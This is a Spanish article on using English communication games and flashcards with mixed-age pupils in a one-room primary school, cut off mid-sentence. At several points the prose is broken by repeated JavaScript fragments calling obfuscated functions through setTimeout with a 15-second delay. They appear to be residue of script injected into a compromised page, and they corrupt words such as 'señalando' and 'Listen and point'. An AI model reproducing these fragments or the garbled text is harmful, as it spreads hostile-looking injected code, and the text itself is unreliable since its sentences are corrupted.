JUEGOS DE COMUNICACIÓN DE INGLÉS EN EL AULA UNITARIA

Autora: María Benítez Sanz

          Con este artículo, y desde mi experiencia, me gustaría dar una serie de ideas y nociones básicas a aquellos maestros de inglés que, como yo, se han tenido que enfrentar ante la complicada tarea de tener que dar una clase de idiomas en una aula unitaria, donde confluyen una serie de factores que hacen que una simple clase de inglés se pueda convertir en un verdadero hándicap para el docente.


          Quisiera comenzar señalandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando que aunque mi experiencia en una escuela unitaria haya sido apenas de un curso de duración, el conocimiento obtenido de esta experiencia será algo que no pueda remplazar durante mucho tiempo. Desde mi punto de vista, el maestro llega a aprender de sus alumnos, así como los alumnos aprenden unos de otros, a pesar de tener diferentes edades y niveles y se trata de un proceso de enseñanza-aprendizaje totalmente distinto al que podamos encontrar en un aula ordinaria. Pero mi pregunta es ¿Cómo se enfrenta el maestro de inglés ante un grupo de alumnos con diferentes edades, diferentes niveles de inglés, diferentes expectativas, conocimientos y materiales didácticos? En este tipo de experiencias es donde debe salir a relucir la verdadera capacidad del docente para saber de forma ingeniosa combinar diferentes aprendizajes, destrezas, capacidades, de tal manera que al final de este largo proceso, resulte como producto final un aprendizaje significativo en todas sus dimensiones.


          La típica clase de inglés en la que el profesor utiliza como principal recurso didáctico el libro de texto, desde mi punto de vista, es una estrategia metodológica que no sería aplicable en un aula de estas características. Los maestros de Inglés debemos saber combinar diferentes técnicas, metodologías y materiales, siendo eclécticos, y aprovechandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando al máximo todos nuestros recursos disponibles, entre otras cosas, porque tenemos que atender diferentes niveles y capacidades, y, si en un aula ordinaria ya nos resulta complicado atender a la diversidad, no podemos llegar nunca a imaginar lo que supone esta misma tarea en una aula unitaria, donde no solo convergen alumnos de distintos niveles, sino que es más: dentro de cada uno de esos niveles, los alumnos tienen diferentes capacidades y estilos de aprendizaje.


          De esta forma, y desde mi experiencia como maestra de Inglés, me gustaría destacar la importancia que tienen los juegos de comunicación como recurso didáctico para el aprendizaje del idioma dentro de un aula unitaria con alumnos de distintos cursos desde Infantil hasta 6º de Primaria. Dado que nos resultaría una tarea muy ardua tener que seguir todos los días el libro de Inglés y explicar uno a uno y por niveles cada uno de los conceptos o actividades a realizar, un recurso muy útil y muy sencillo que podemos utilizar de vez en cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando son los juegos de comunicación, donde tanto los alumnos más pequeños como los mayores podrán sentirse partícipes de esta experiencia didáctica.


          PARA COMENZAR: Un buen material que podemos emplear en el aula de idiomas con este tipo de características serán los bits de inteligencia en Inglés o las flashcards. Una buena idea es que nos fijemos en el vocabulario de los alumnos en cada uno de los niveles y dediquemos todos los días al menos un ratito a repasar de forma generalizada todos los conceptos. De esta forma, el aprendizaje será mucho más global y los alumnos más pequeños recibirán una gran cantidad de inputs mientras que los mayores repasarán ya conceptos que han visto en cursos anteriores.


          Ahora vamos a ver algunos juegos que podemos emplear con esas flashcards:

1.- GRANNY, GRANNY DO YOU LIKE…..? Con este juego de comunicación se pretende repasar el vocabulario relacionado con la comida (food) así como la estructura Do you like:……? Para hablar de los gustos en Inglés. Es muy similar al juego español de “Abuelita, abuelita, te gusta……?; por ello, los niños se sentirán mas familiarizados con él.


          Tras revisar el vocabulario de la comida con diversas actividades con las flashcards, como Listen andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and point or Listen andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and repeat, elegiremos a uno de los alumnos que se sentará en frente de la clase en una silla y que simulará ser la “abuelita” (granny). El resto de alumnos se pondrá de pie en frente de la abuelita y a una considerable distancia y le preguntará uno por uno por las diferentes comidas, las cuales, por medio de flashcards, permanecerán en la pizarra pegadas con blue-tac para que puedan servir de ayuda sobre todo a los más pequeños. De este modo, uno a uno le preguntarán: Granny, Granny do you like cheese? Por ejemplo, y así con las diferentes comidas. La abuelita podrá responder de varias formas:

  • Si no le gusta: “No, I don´t like” (en este caso el alumno que preguntar permanecerá en el sitio sin moverse)
  • Si le gusta un poco podrá decir: “ Yes, l like, one, two or three small steps”
  • Si le gusta mucho: “Yes I like, one, two or three big steps”.

          Con estas respuestas los alumnos que preguntan irán camin<